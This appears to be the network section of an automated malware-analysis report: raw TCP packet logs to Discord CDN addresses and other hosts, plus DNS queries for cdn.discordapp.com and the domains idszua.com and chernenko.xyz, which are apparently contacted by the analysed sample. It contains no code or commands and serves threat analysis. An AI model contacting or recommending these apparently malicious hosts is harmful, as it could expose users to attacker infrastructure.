                                                        Feb 22, 2023 08:36:18.508728027 CET49704443192.168.2.5162.159.135.233
                                                        Feb 22, 2023 08:36:18.508744001 CET44349704162.159.135.233192.168.2.5
                                                        Feb 22, 2023 08:36:18.508800983 CET49704443192.168.2.5162.159.135.233
                                                        Feb 22, 2023 08:36:18.509685993 CET44349704162.159.135.233192.168.2.5
                                                        Feb 22, 2023 08:36:18.509716034 CET44349704162.159.135.233192.168.2.5
                                                        Feb 22, 2023 08:36:18.509798050 CET49704443192.168.2.5162.159.135.233
                                                        Feb 22, 2023 08:36:18.509812117 CET44349704162.159.135.233192.168.2.5
                                                        Feb 22, 2023 08:36:18.509844065 CET49704443192.168.2.5162.159.135.233
                                                        Feb 22, 2023 08:36:18.511178017 CET44349704162.159.135.233192.168.2.5
                                                        Feb 22, 2023 08:36:18.511217117 CET44349704162.159.135.233192.168.2.5
                                                        Feb 22, 2023 08:36:18.511296988 CET49704443192.168.2.5162.159.135.233
                                                        Feb 22, 2023 08:36:18.511312008 CET44349704162.159.135.233192.168.2.5
                                                        Feb 22, 2023 08:36:18.511362076 CET49704443192.168.2.5162.159.135.233
                                                        Feb 22, 2023 08:36:18.512317896 CET44349704162.159.135.233192.168.2.5
                                                        Feb 22, 2023 08:36:18.512428999 CET49704443192.168.2.5162.159.135.233
                                                        Feb 22, 2023 08:36:18.512444019 CET44349704162.159.135.233192.168.2.5
                                                        Feb 22, 2023 08:36:18.512481928 CET44349704162.159.135.233192.168.2.5
                                                        Feb 22, 2023 08:36:18.512543917 CET49704443192.168.2.5162.159.135.233
                                                        Feb 22, 2023 08:36:18.513725996 CET49704443192.168.2.5162.159.135.233
                                                        Feb 22, 2023 08:36:36.919852972 CET49705443192.168.2.5162.159.129.233
                                                        Feb 22, 2023 08:36:36.919898033 CET44349705162.159.129.233192.168.2.5
                                                        Feb 22, 2023 08:36:36.920012951 CET49705443192.168.2.5162.159.129.233
                                                        Feb 22, 2023 08:36:36.932693005 CET49705443192.168.2.5162.159.129.233
                                                        Feb 22, 2023 08:36:36.932718992 CET44349705162.159.129.233192.168.2.5
                                                        Feb 22, 2023 08:36:36.980469942 CET44349705162.159.129.233192.168.2.5
                                                        Feb 22, 2023 08:36:36.980561018 CET49705443192.168.2.5162.159.129.233
                                                        Feb 22, 2023 08:36:36.983355045 CET49705443192.168.2.5162.159.129.233
                                                        Feb 22, 2023 08:36:36.983377934 CET44349705162.159.129.233192.168.2.5
                                                        Feb 22, 2023 08:36:36.983968019 CET44349705162.159.129.233192.168.2.5
                                                        Feb 22, 2023 08:36:37.122720003 CET49705443192.168.2.5162.159.129.233
                                                        Feb 22, 2023 08:36:37.385772943 CET49705443192.168.2.5162.159.129.233
                                                        Feb 22, 2023 08:36:37.385811090 CET44349705162.159.129.233192.168.2.5
                                                        Feb 22, 2023 08:36:37.425050020 CET44349705162.159.129.233192.168.2.5
                                                        Feb 22, 2023 08:36:37.425173998 CET44349705162.159.129.233192.168.2.5
                                                        Feb 22, 2023 08:36:37.425230026 CET44349705162.159.129.233192.168.2.5
                                                        Feb 22, 2023 08:36:37.425249100 CET49705443192.168.2.5162.159.129.233
                                                        Feb 22, 2023 08:36:37.425277948 CET44349705162.159.129.233192.168.2.5
                                                        Feb 22, 2023 08:36:37.425326109 CET49705443192.168.2.5162.159.129.233
                                                        Feb 22, 2023 08:36:37.425332069 CET44349705162.159.129.233192.168.2.5
                                                        Feb 22, 2023 08:36:37.425353050 CET44349705162.159.129.233192.168.2.5
                                                        Feb 22, 2023 08:36:37.425405979 CET49705443192.168.2.5162.159.129.233
                                                        Feb 22, 2023 08:36:37.425425053 CET44349705162.159.129.233192.168.2.5
                                                        Feb 22, 2023 08:36:37.425501108 CET44349705162.159.129.233192.168.2.5
                                                        Feb 22, 2023 08:36:37.425543070 CET49705443192.168.2.5162.159.129.233
                                                        Feb 22, 2023 08:36:37.425545931 CET44349705162.159.129.233192.168.2.5
                                                        Feb 22, 2023 08:36:37.425564051 CET44349705162.159.129.233192.168.2.5
                                                        Feb 22, 2023 08:36:37.425607920 CET49705443192.168.2.5162.159.129.233
                                                        Feb 22, 2023 08:36:37.425625086 CET44349705162.159.129.233192.168.2.5
                                                        Feb 22, 2023 08:36:37.426281929 CET44349705162.159.129.233192.168.2.5
                                                        Feb 22, 2023 08:36:37.426333904 CET44349705162.159.129.233192.168.2.5
                                                        Feb 22, 2023 08:36:37.426378965 CET44349705162.159.129.233192.168.2.5
                                                        Feb 22, 2023 08:36:37.426378965 CET49705443192.168.2.5162.159.129.233
                                                        Feb 22, 2023 08:36:37.426402092 CET44349705162.159.129.233192.168.2.5
                                                        Feb 22, 2023 08:36:37.426440954 CET49705443192.168.2.5162.159.129.233
                                                        Feb 22, 2023 08:36:37.427076101 CET44349705162.159.129.233192.168.2.5
                                                        Feb 22, 2023 08:36:37.427151918 CET44349705162.159.129.233192.168.2.5
                                                        Feb 22, 2023 08:36:37.427155018 CET49705443192.168.2.5162.159.129.233
                                                        Feb 22, 2023 08:36:37.427180052 CET44349705162.159.129.233192.168.2.5
                                                        Feb 22, 2023 08:36:37.427301884 CET49705443192.168.2.5162.159.129.233
                                                        Feb 22, 2023 08:36:37.427954912 CET44349705162.159.129.233192.168.2.5
                                                        Feb 22, 2023 08:36:37.428047895 CET44349705162.159.129.233192.168.2.5
                                                        Feb 22, 2023 08:36:37.428097010 CET44349705162.159.129.233192.168.2.5
                                                        Feb 22, 2023 08:36:37.428100109 CET49705443192.168.2.5162.159.129.233
                                                        Feb 22, 2023 08:36:37.428114891 CET44349705162.159.129.233192.168.2.5
                                                        Feb 22, 2023 08:36:37.428160906 CET49705443192.168.2.5162.159.129.233
                                                        Feb 22, 2023 08:36:37.428914070 CET44349705162.159.129.233192.168.2.5
                                                        Feb 22, 2023 08:36:37.429095984 CET44349705162.159.129.233192.168.2.5
                                                        Feb 22, 2023 08:36:37.429141998 CET44349705162.159.129.233192.168.2.5
                                                        Feb 22, 2023 08:36:37.429155111 CET49705443192.168.2.5162.159.129.233
                                                        Feb 22, 2023 08:36:37.429176092 CET44349705162.159.129.233192.168.2.5
                                                        Feb 22, 2023 08:36:37.429215908 CET49705443192.168.2.5162.159.129.233
                                                        Feb 22, 2023 08:36:37.429522991 CET44349705162.159.129.233192.168.2.5
                                                        Feb 22, 2023 08:36:37.443238974 CET44349705162.159.129.233192.168.2.5
                                                        Feb 22, 2023 08:36:37.443339109 CET49705443192.168.2.5162.159.129.233
                                                        Feb 22, 2023 08:36:37.443361998 CET44349705162.159.129.233192.168.2.5
                                                        Feb 22, 2023 08:36:37.443435907 CET44349705162.159.129.233192.168.2.5
                                                        Feb 22, 2023 08:36:37.443490028 CET49705443192.168.2.5162.159.129.233
                                                        Feb 22, 2023 08:36:37.443509102 CET44349705162.159.129.233192.168.2.5
                                                        Feb 22, 2023 08:36:37.443842888 CET44349705162.159.129.233192.168.2.5
                                                        Feb 22, 2023 08:36:37.443913937 CET49705443192.168.2.5162.159.129.233
                                                        Feb 22, 2023 08:36:37.443931103 CET44349705162.159.129.233192.168.2.5
                                                        Feb 22, 2023 08:36:37.444031954 CET44349705162.159.129.233192.168.2.5
                                                        Feb 22, 2023 08:36:37.444091082 CET49705443192.168.2.5162.159.129.233
                                                        Feb 22, 2023 08:36:37.444104910 CET44349705162.159.129.233192.168.2.5
                                                        Feb 22, 2023 08:36:37.444559097 CET44349705162.159.129.233192.168.2.5
                                                        Feb 22, 2023 08:36:37.444655895 CET49705443192.168.2.5162.159.129.233
                                                        Feb 22, 2023 08:36:37.444674969 CET44349705162.159.129.233192.168.2.5
                                                        Feb 22, 2023 08:36:37.444987059 CET44349705162.159.129.233192.168.2.5
                                                        Feb 22, 2023 08:36:37.445061922 CET44349705162.159.129.233192.168.2.5
                                                        Feb 22, 2023 08:36:37.445070982 CET49705443192.168.2.5162.159.129.233
                                                        Feb 22, 2023 08:36:37.445095062 CET44349705162.159.129.233192.168.2.5
                                                        Feb 22, 2023 08:36:37.445132971 CET49705443192.168.2.5162.159.129.233
                                                        Feb 22, 2023 08:36:37.445142984 CET44349705162.159.129.233192.168.2.5
                                                        Feb 22, 2023 08:36:37.445866108 CET44349705162.159.129.233192.168.2.5
                                                        Feb 22, 2023 08:36:37.445959091 CET49705443192.168.2.5162.159.129.233
                                                        Feb 22, 2023 08:36:37.445979118 CET44349705162.159.129.233192.168.2.5
                                                        Feb 22, 2023 08:36:37.446571112 CET44349705162.159.129.233192.168.2.5
                                                        Feb 22, 2023 08:36:37.446643114 CET49705443192.168.2.5162.159.129.233
                                                        Feb 22, 2023 08:36:37.446660995 CET44349705162.159.129.233192.168.2.5
                                                        Feb 22, 2023 08:36:37.446708918 CET49705443192.168.2.5162.159.129.233
                                                        Feb 22, 2023 08:36:37.446723938 CET44349705162.159.129.233192.168.2.5
                                                        Feb 22, 2023 08:36:37.447330952 CET44349705162.159.129.233192.168.2.5
                                                        Feb 22, 2023 08:36:37.447401047 CET49705443192.168.2.5162.159.129.233
                                                        Feb 22, 2023 08:36:37.447421074 CET44349705162.159.129.233192.168.2.5
                                                        Feb 22, 2023 08:36:37.447463036 CET49705443192.168.2.5162.159.129.233
                                                        Feb 22, 2023 08:36:37.448185921 CET44349705162.159.129.233192.168.2.5
                                                        Feb 22, 2023 08:36:37.448261976 CET49705443192.168.2.5162.159.129.233
                                                        Feb 22, 2023 08:36:37.448986053 CET44349705162.159.129.233192.168.2.5
                                                        Feb 22, 2023 08:36:37.449758053 CET44349705162.159.129.233192.168.2.5
                                                        Feb 22, 2023 08:36:37.449811935 CET49705443192.168.2.5162.159.129.233
                                                        Feb 22, 2023 08:36:37.449831009 CET44349705162.159.129.233192.168.2.5
                                                        Feb 22, 2023 08:36:37.449852943 CET49705443192.168.2.5162.159.129.233
                                                        Feb 22, 2023 08:36:37.450148106 CET44349705162.159.129.233192.168.2.5
                                                        Feb 22, 2023 08:36:37.450644016 CET49705443192.168.2.5162.159.129.233
                                                        Feb 22, 2023 08:36:37.450664997 CET44349705162.159.129.233192.168.2.5
                                                        Feb 22, 2023 08:36:37.451024055 CET49705443192.168.2.5162.159.129.233
                                                        Feb 22, 2023 08:36:37.451097965 CET44349705162.159.129.233192.168.2.5
                                                        Feb 22, 2023 08:36:37.451294899 CET49705443192.168.2.5162.159.129.233
                                                        Feb 22, 2023 08:36:37.461343050 CET44349705162.159.129.233192.168.2.5
                                                        Feb 22, 2023 08:36:37.461426973 CET49705443192.168.2.5162.159.129.233
                                                        Feb 22, 2023 08:36:37.461507082 CET44349705162.159.129.233192.168.2.5
                                                        Feb 22, 2023 08:36:37.461570024 CET49705443192.168.2.5162.159.129.233
                                                        Feb 22, 2023 08:36:37.461574078 CET44349705162.159.129.233192.168.2.5
                                                        Feb 22, 2023 08:36:37.461595058 CET44349705162.159.129.233192.168.2.5
                                                        Feb 22, 2023 08:36:37.461633921 CET49705443192.168.2.5162.159.129.233
                                                        Feb 22, 2023 08:36:37.461662054 CET49705443192.168.2.5162.159.129.233
                                                        Feb 22, 2023 08:36:37.462301016 CET44349705162.159.129.233192.168.2.5
                                                        Feb 22, 2023 08:36:37.462389946 CET49705443192.168.2.5162.159.129.233
                                                        Feb 22, 2023 08:36:37.462569952 CET44349705162.159.129.233192.168.2.5
                                                        Feb 22, 2023 08:36:37.462639093 CET49705443192.168.2.5162.159.129.233
                                                        Feb 22, 2023 08:36:37.463419914 CET44349705162.159.129.233192.168.2.5
                                                        Feb 22, 2023 08:36:37.463490963 CET44349705162.159.129.233192.168.2.5
                                                        Feb 22, 2023 08:36:37.463541031 CET49705443192.168.2.5162.159.129.233
                                                        Feb 22, 2023 08:36:37.463566065 CET44349705162.159.129.233192.168.2.5
                                                        Feb 22, 2023 08:36:37.463584900 CET49705443192.168.2.5162.159.129.233
                                                        Feb 22, 2023 08:36:37.463618040 CET49705443192.168.2.5162.159.129.233
                                                        Feb 22, 2023 08:36:37.464452982 CET44349705162.159.129.233192.168.2.5
                                                        Feb 22, 2023 08:36:37.464545012 CET49705443192.168.2.5162.159.129.233
                                                        Feb 22, 2023 08:36:37.465547085 CET44349705162.159.129.233192.168.2.5
                                                        Feb 22, 2023 08:36:37.465610027 CET44349705162.159.129.233192.168.2.5
                                                        Feb 22, 2023 08:36:37.465639114 CET49705443192.168.2.5162.159.129.233
                                                        Feb 22, 2023 08:36:37.465661049 CET44349705162.159.129.233192.168.2.5
                                                        Feb 22, 2023 08:36:37.465677023 CET49705443192.168.2.5162.159.129.233
                                                        Feb 22, 2023 08:36:37.466152906 CET44349705162.159.129.233192.168.2.5
                                                        Feb 22, 2023 08:36:37.466238022 CET49705443192.168.2.5162.159.129.233
                                                        Feb 22, 2023 08:36:37.466247082 CET44349705162.159.129.233192.168.2.5
                                                        Feb 22, 2023 08:36:37.466267109 CET44349705162.159.129.233192.168.2.5
                                                        Feb 22, 2023 08:36:37.466296911 CET49705443192.168.2.5162.159.129.233
                                                        Feb 22, 2023 08:36:37.467020035 CET44349705162.159.129.233192.168.2.5
                                                        Feb 22, 2023 08:36:37.467118025 CET49705443192.168.2.5162.159.129.233
                                                        Feb 22, 2023 08:36:37.467138052 CET44349705162.159.129.233192.168.2.5
                                                        Feb 22, 2023 08:36:37.467187881 CET49705443192.168.2.5162.159.129.233
                                                        Feb 22, 2023 08:36:37.467820883 CET44349705162.159.129.233192.168.2.5
                                                        Feb 22, 2023 08:36:37.467886925 CET44349705162.159.129.233192.168.2.5
                                                        Feb 22, 2023 08:36:37.467915058 CET49705443192.168.2.5162.159.129.233
                                                        Feb 22, 2023 08:36:37.467933893 CET44349705162.159.129.233192.168.2.5
                                                        Feb 22, 2023 08:36:37.467955112 CET49705443192.168.2.5162.159.129.233
                                                        Feb 22, 2023 08:36:37.467978001 CET49705443192.168.2.5162.159.129.233
                                                        Feb 22, 2023 08:36:37.468861103 CET44349705162.159.129.233192.168.2.5
                                                        Feb 22, 2023 08:36:37.468962908 CET49705443192.168.2.5162.159.129.233
                                                        Feb 22, 2023 08:36:37.469607115 CET44349705162.159.129.233192.168.2.5
                                                        Feb 22, 2023 08:36:37.469721079 CET49705443192.168.2.5162.159.129.233
                                                        Feb 22, 2023 08:36:37.469729900 CET44349705162.159.129.233192.168.2.5
                                                        Feb 22, 2023 08:36:37.469748974 CET44349705162.159.129.233192.168.2.5
                                                        Feb 22, 2023 08:36:37.469782114 CET49705443192.168.2.5162.159.129.233
                                                        Feb 22, 2023 08:36:37.470478058 CET44349705162.159.129.233192.168.2.5
                                                        Feb 22, 2023 08:36:37.470557928 CET49705443192.168.2.5162.159.129.233
                                                        Feb 22, 2023 08:36:37.470576048 CET44349705162.159.129.233192.168.2.5
                                                        Feb 22, 2023 08:36:37.470628977 CET49705443192.168.2.5162.159.129.233
                                                        Feb 22, 2023 08:36:37.471354008 CET44349705162.159.129.233192.168.2.5
                                                        Feb 22, 2023 08:36:37.471432924 CET44349705162.159.129.233192.168.2.5
                                                        Feb 22, 2023 08:36:37.471453905 CET49705443192.168.2.5162.159.129.233
                                                        Feb 22, 2023 08:36:37.471472979 CET44349705162.159.129.233192.168.2.5
                                                        Feb 22, 2023 08:36:37.471493006 CET49705443192.168.2.5162.159.129.233
                                                        Feb 22, 2023 08:36:37.471513033 CET49705443192.168.2.5162.159.129.233
                                                        Feb 22, 2023 08:36:37.472249031 CET44349705162.159.129.233192.168.2.5
                                                        Feb 22, 2023 08:36:37.472328901 CET49705443192.168.2.5162.159.129.233
                                                        Feb 22, 2023 08:36:37.472882986 CET44349705162.159.129.233192.168.2.5
                                                        Feb 22, 2023 08:36:37.472992897 CET49705443192.168.2.5162.159.129.233
                                                        Feb 22, 2023 08:36:37.473020077 CET44349705162.159.129.233192.168.2.5
                                                        Feb 22, 2023 08:36:37.473078966 CET49705443192.168.2.5162.159.129.233
                                                        Feb 22, 2023 08:36:37.473774910 CET44349705162.159.129.233192.168.2.5
                                                        Feb 22, 2023 08:36:37.473858118 CET49705443192.168.2.5162.159.129.233
                                                        Feb 22, 2023 08:36:37.474564075 CET44349705162.159.129.233192.168.2.5
                                                        Feb 22, 2023 08:36:37.474644899 CET49705443192.168.2.5162.159.129.233
                                                        Feb 22, 2023 08:36:37.474714041 CET44349705162.159.129.233192.168.2.5
                                                        Feb 22, 2023 08:36:37.474781990 CET49705443192.168.2.5162.159.129.233
                                                        Feb 22, 2023 08:36:37.475620031 CET44349705162.159.129.233192.168.2.5
                                                        Feb 22, 2023 08:36:37.475702047 CET49705443192.168.2.5162.159.129.233
                                                        Feb 22, 2023 08:36:37.476279020 CET44349705162.159.129.233192.168.2.5
                                                        Feb 22, 2023 08:36:37.476351976 CET44349705162.159.129.233192.168.2.5
                                                        Feb 22, 2023 08:36:37.476361036 CET49705443192.168.2.5162.159.129.233
                                                        Feb 22, 2023 08:36:37.476391077 CET44349705162.159.129.233192.168.2.5
                                                        Feb 22, 2023 08:36:37.476421118 CET49705443192.168.2.5162.159.129.233
                                                        Feb 22, 2023 08:36:37.477260113 CET44349705162.159.129.233192.168.2.5
                                                        Feb 22, 2023 08:36:37.477329016 CET49705443192.168.2.5162.159.129.233
                                                        Feb 22, 2023 08:36:37.477349043 CET44349705162.159.129.233192.168.2.5
                                                        Feb 22, 2023 08:36:37.477401018 CET49705443192.168.2.5162.159.129.233
                                                        Feb 22, 2023 08:36:37.478549004 CET49705443192.168.2.5162.159.129.233
                                                        Feb 22, 2023 08:36:37.478596926 CET44349705162.159.129.233192.168.2.5
                                                        Feb 22, 2023 08:36:37.478660107 CET44349705162.159.129.233192.168.2.5
                                                        Feb 22, 2023 08:36:37.478704929 CET49705443192.168.2.5162.159.129.233
                                                        Feb 22, 2023 08:36:37.478720903 CET44349705162.159.129.233192.168.2.5
                                                        Feb 22, 2023 08:36:37.478744984 CET49705443192.168.2.5162.159.129.233
                                                        Feb 22, 2023 08:36:37.479460955 CET49705443192.168.2.5162.159.129.233
                                                        Feb 22, 2023 08:36:37.479556084 CET49705443192.168.2.5162.159.129.233
                                                        Feb 22, 2023 08:36:37.480669022 CET44349705162.159.129.233192.168.2.5
                                                        Feb 22, 2023 08:36:37.480698109 CET44349705162.159.129.233192.168.2.5
                                                        Feb 22, 2023 08:36:37.480765104 CET49705443192.168.2.5162.159.129.233
                                                        Feb 22, 2023 08:36:37.480779886 CET44349705162.159.129.233192.168.2.5
                                                        Feb 22, 2023 08:36:37.480823994 CET49705443192.168.2.5162.159.129.233
                                                        Feb 22, 2023 08:36:37.482224941 CET44349705162.159.129.233192.168.2.5
                                                        Feb 22, 2023 08:36:37.482254028 CET44349705162.159.129.233192.168.2.5
                                                        Feb 22, 2023 08:36:37.482300043 CET49705443192.168.2.5162.159.129.233
                                                        Feb 22, 2023 08:36:37.482320070 CET44349705162.159.129.233192.168.2.5
                                                        Feb 22, 2023 08:36:37.482347012 CET49705443192.168.2.5162.159.129.233
                                                        Feb 22, 2023 08:36:37.483359098 CET44349705162.159.129.233192.168.2.5
                                                        Feb 22, 2023 08:36:37.483382940 CET44349705162.159.129.233192.168.2.5
                                                        Feb 22, 2023 08:36:37.483458996 CET49705443192.168.2.5162.159.129.233
                                                        Feb 22, 2023 08:36:37.483475924 CET44349705162.159.129.233192.168.2.5
                                                        Feb 22, 2023 08:36:37.483525991 CET49705443192.168.2.5162.159.129.233
                                                        Feb 22, 2023 08:36:37.485330105 CET44349705162.159.129.233192.168.2.5
                                                        Feb 22, 2023 08:36:37.485358953 CET44349705162.159.129.233192.168.2.5
                                                        Feb 22, 2023 08:36:37.485418081 CET49705443192.168.2.5162.159.129.233
                                                        Feb 22, 2023 08:36:37.485435963 CET44349705162.159.129.233192.168.2.5
                                                        Feb 22, 2023 08:36:37.485512972 CET49705443192.168.2.5162.159.129.233
                                                        Feb 22, 2023 08:36:37.486767054 CET44349705162.159.129.233192.168.2.5
                                                        Feb 22, 2023 08:36:37.486798048 CET44349705162.159.129.233192.168.2.5
                                                        Feb 22, 2023 08:36:37.486886024 CET49705443192.168.2.5162.159.129.233
                                                        Feb 22, 2023 08:36:37.486901999 CET44349705162.159.129.233192.168.2.5
                                                        Feb 22, 2023 08:36:37.486946106 CET49705443192.168.2.5162.159.129.233
                                                        Feb 22, 2023 08:36:37.487586975 CET44349705162.159.129.233192.168.2.5
                                                        Feb 22, 2023 08:36:37.487621069 CET44349705162.159.129.233192.168.2.5
                                                        Feb 22, 2023 08:36:37.487756014 CET49705443192.168.2.5162.159.129.233
                                                        Feb 22, 2023 08:36:37.487776041 CET44349705162.159.129.233192.168.2.5
                                                        Feb 22, 2023 08:36:37.489303112 CET44349705162.159.129.233192.168.2.5
                                                        Feb 22, 2023 08:36:37.489355087 CET44349705162.159.129.233192.168.2.5
                                                        Feb 22, 2023 08:36:37.489389896 CET49705443192.168.2.5162.159.129.233
                                                        Feb 22, 2023 08:36:37.489408016 CET44349705162.159.129.233192.168.2.5
                                                        Feb 22, 2023 08:36:37.489440918 CET49705443192.168.2.5162.159.129.233
                                                        Feb 22, 2023 08:36:37.491040945 CET44349705162.159.129.233192.168.2.5
                                                        Feb 22, 2023 08:36:37.491086006 CET44349705162.159.129.233192.168.2.5
                                                        Feb 22, 2023 08:36:37.491133928 CET49705443192.168.2.5162.159.129.233
                                                        Feb 22, 2023 08:36:37.491156101 CET44349705162.159.129.233192.168.2.5
                                                        Feb 22, 2023 08:36:37.491194010 CET49705443192.168.2.5162.159.129.233
                                                        Feb 22, 2023 08:36:37.492345095 CET44349705162.159.129.233192.168.2.5
                                                        Feb 22, 2023 08:36:37.492393970 CET44349705162.159.129.233192.168.2.5
                                                        Feb 22, 2023 08:36:37.492436886 CET49705443192.168.2.5162.159.129.233
                                                        Feb 22, 2023 08:36:37.492456913 CET44349705162.159.129.233192.168.2.5
                                                        Feb 22, 2023 08:36:37.492491007 CET49705443192.168.2.5162.159.129.233
                                                        Feb 22, 2023 08:36:37.493418932 CET44349705162.159.129.233192.168.2.5
                                                        Feb 22, 2023 08:36:37.493474007 CET44349705162.159.129.233192.168.2.5
                                                        Feb 22, 2023 08:36:37.493490934 CET49705443192.168.2.5162.159.129.233
                                                        Feb 22, 2023 08:36:37.493506908 CET44349705162.159.129.233192.168.2.5
                                                        Feb 22, 2023 08:36:37.493539095 CET49705443192.168.2.5162.159.129.233
                                                        Feb 22, 2023 08:36:37.493567944 CET49705443192.168.2.5162.159.129.233
                                                        Feb 22, 2023 08:36:37.494966030 CET44349705162.159.129.233192.168.2.5
                                                        Feb 22, 2023 08:36:37.495012045 CET44349705162.159.129.233192.168.2.5
                                                        Feb 22, 2023 08:36:37.495066881 CET49705443192.168.2.5162.159.129.233
                                                        Feb 22, 2023 08:36:37.495085001 CET44349705162.159.129.233192.168.2.5
                                                        Feb 22, 2023 08:36:37.495102882 CET49705443192.168.2.5162.159.129.233
                                                        Feb 22, 2023 08:36:37.496002913 CET44349705162.159.129.233192.168.2.5
                                                        Feb 22, 2023 08:36:37.496036053 CET44349705162.159.129.233192.168.2.5
                                                        Feb 22, 2023 08:36:37.496082067 CET49705443192.168.2.5162.159.129.233
                                                        Feb 22, 2023 08:36:37.496100903 CET44349705162.159.129.233192.168.2.5
                                                        Feb 22, 2023 08:36:37.496140957 CET49705443192.168.2.5162.159.129.233
                                                        Feb 22, 2023 08:36:37.496886969 CET44349705162.159.129.233192.168.2.5
                                                        Feb 22, 2023 08:36:37.496915102 CET44349705162.159.129.233192.168.2.5
                                                        Feb 22, 2023 08:36:37.497106075 CET49705443192.168.2.5162.159.129.233
                                                        Feb 22, 2023 08:36:37.497128963 CET44349705162.159.129.233192.168.2.5
                                                        Feb 22, 2023 08:36:37.497788906 CET44349705162.159.129.233192.168.2.5
                                                        Feb 22, 2023 08:36:37.497862101 CET49705443192.168.2.5162.159.129.233
                                                        Feb 22, 2023 08:36:37.497876883 CET44349705162.159.129.233192.168.2.5
                                                        Feb 22, 2023 08:36:37.497915030 CET44349705162.159.129.233192.168.2.5
                                                        Feb 22, 2023 08:36:37.497958899 CET49705443192.168.2.5162.159.129.233
                                                        Feb 22, 2023 08:36:37.499183893 CET49705443192.168.2.5162.159.129.233
                                                        Feb 22, 2023 08:37:18.174247026 CET4971080192.168.2.520.216.185.237
                                                        Feb 22, 2023 08:37:18.201901913 CET804971020.216.185.237192.168.2.5
                                                        Feb 22, 2023 08:37:18.202013016 CET4971080192.168.2.520.216.185.237
                                                        Feb 22, 2023 08:37:18.202126980 CET4971080192.168.2.520.216.185.237
                                                        Feb 22, 2023 08:37:18.229598045 CET804971020.216.185.237192.168.2.5
                                                        Feb 22, 2023 08:37:18.229660034 CET804971020.216.185.237192.168.2.5
                                                        Feb 22, 2023 08:37:18.229701996 CET804971020.216.185.237192.168.2.5
                                                        Feb 22, 2023 08:37:18.229924917 CET4971080192.168.2.520.216.185.237
                                                        Feb 22, 2023 08:37:18.229969025 CET4971080192.168.2.520.216.185.237
                                                        Feb 22, 2023 08:37:18.259537935 CET804971020.216.185.237192.168.2.5
                                                        Feb 22, 2023 08:37:23.307188034 CET4971180192.168.2.5194.102.227.30
                                                        Feb 22, 2023 08:37:26.312886000 CET4971180192.168.2.5194.102.227.30
                                                        Feb 22, 2023 08:37:32.391405106 CET4971180192.168.2.5194.102.227.30
                                                        Feb 22, 2023 08:37:45.458245039 CET4971180192.168.2.5194.102.227.30
                                                        Feb 22, 2023 08:37:48.470947027 CET4971180192.168.2.5194.102.227.30
                                                        Feb 22, 2023 08:37:54.487180948 CET4971180192.168.2.5194.102.227.30
                                                        Feb 22, 2023 08:38:14.039288998 CET4971580192.168.2.5194.102.227.30
                                                        Feb 22, 2023 08:38:14.612979889 CET4971680192.168.2.583.229.19.64
                                                        Feb 22, 2023 08:38:14.647130013 CET804971683.229.19.64192.168.2.5
                                                        Feb 22, 2023 08:38:14.647382975 CET4971680192.168.2.583.229.19.64
                                                        Feb 22, 2023 08:38:14.647630930 CET4971680192.168.2.583.229.19.64
                                                        Feb 22, 2023 08:38:14.681705952 CET804971683.229.19.64192.168.2.5
                                                        Feb 22, 2023 08:38:14.714514017 CET804971683.229.19.64192.168.2.5
                                                        Feb 22, 2023 08:38:14.714545012 CET804971683.229.19.64192.168.2.5
                                                        Feb 22, 2023 08:38:14.714847088 CET4971680192.168.2.583.229.19.64
                                                        Feb 22, 2023 08:38:16.148297071 CET4971680192.168.2.583.229.19.64
                                                        Feb 22, 2023 08:38:17.038981915 CET4971580192.168.2.5194.102.227.30
                                                        Feb 22, 2023 08:38:17.165810108 CET4971780192.168.2.583.229.19.64
                                                        Feb 22, 2023 08:38:17.201222897 CET804971783.229.19.64192.168.2.5
                                                        Feb 22, 2023 08:38:17.201342106 CET4971780192.168.2.583.229.19.64
                                                        Feb 22, 2023 08:38:17.201555014 CET4971780192.168.2.583.229.19.64
                                                        Feb 22, 2023 08:38:17.235723972 CET804971783.229.19.64192.168.2.5
                                                        Feb 22, 2023 08:38:17.237879992 CET804971783.229.19.64192.168.2.5
                                                        Feb 22, 2023 08:38:17.237912893 CET804971783.229.19.64192.168.2.5
                                                        Feb 22, 2023 08:38:17.237953901 CET804971783.229.19.64192.168.2.5
                                                        Feb 22, 2023 08:38:17.238073111 CET4971780192.168.2.583.229.19.64
                                                        Feb 22, 2023 08:38:17.238357067 CET4971780192.168.2.583.229.19.64
                                                        Feb 22, 2023 08:38:17.275717974 CET804971783.229.19.64192.168.2.5
                                                        Feb 22, 2023 08:38:23.055074930 CET4971580192.168.2.5194.102.227.30

                                                        UDP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Feb 22, 2023 08:36:17.779026031 CET4972453192.168.2.58.8.8.8
                                                        Feb 22, 2023 08:36:17.799638987 CET53497248.8.8.8192.168.2.5
                                                        Feb 22, 2023 08:36:36.848429918 CET6145253192.168.2.58.8.8.8
                                                        Feb 22, 2023 08:36:36.868711948 CET53614528.8.8.8192.168.2.5
                                                        Feb 22, 2023 08:37:07.610869884 CET6344653192.168.2.58.8.8.8
                                                        Feb 22, 2023 08:37:07.682842970 CET53634468.8.8.8192.168.2.5
                                                        Feb 22, 2023 08:37:18.142890930 CET6097553192.168.2.58.8.8.8
                                                        Feb 22, 2023 08:37:18.164654970 CET53609758.8.8.8192.168.2.5
                                                        Feb 22, 2023 08:37:23.247437954 CET5922053192.168.2.58.8.8.8
                                                        Feb 22, 2023 08:37:23.305834055 CET53592208.8.8.8192.168.2.5
                                                        Feb 22, 2023 08:37:45.437405109 CET5668253192.168.2.58.8.8.8
                                                        Feb 22, 2023 08:37:45.457164049 CET53566828.8.8.8192.168.2.5
                                                        Feb 22, 2023 08:38:13.921999931 CET5858153192.168.2.58.8.8.8
                                                        Feb 22, 2023 08:38:14.027007103 CET53585818.8.8.8192.168.2.5
                                                        Feb 22, 2023 08:38:14.574930906 CET5626353192.168.2.58.8.8.8
                                                        Feb 22, 2023 08:38:14.610186100 CET53562638.8.8.8192.168.2.5
                                                        Feb 22, 2023 08:38:34.698437929 CET6551353192.168.2.58.8.8.8
                                                        Feb 22, 2023 08:38:34.728960991 CET53655138.8.8.8192.168.2.5

                                                        DNS Queries

                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                        Feb 22, 2023 08:36:17.779026031 CET192.168.2.58.8.8.80x9be7Standard query (0)cdn.discordapp.comA (IP address)IN (0x0001)false
                                                        Feb 22, 2023 08:36:36.848429918 CET192.168.2.58.8.8.80xaf14Standard query (0)cdn.discordapp.comA (IP address)IN (0x0001)false
                                                        Feb 22, 2023 08:37:07.610869884 CET192.168.2.58.8.8.80xbfd9Standard query (0)www.idszua.comA (IP address)IN (0x0001)false
                                                        Feb 22, 2023 08:37:18.142890930 CET192.168.2.58.8.8.80x7f2cStandard query (0)www.chernenko.xyzA (IP address)IN (0x0001)false
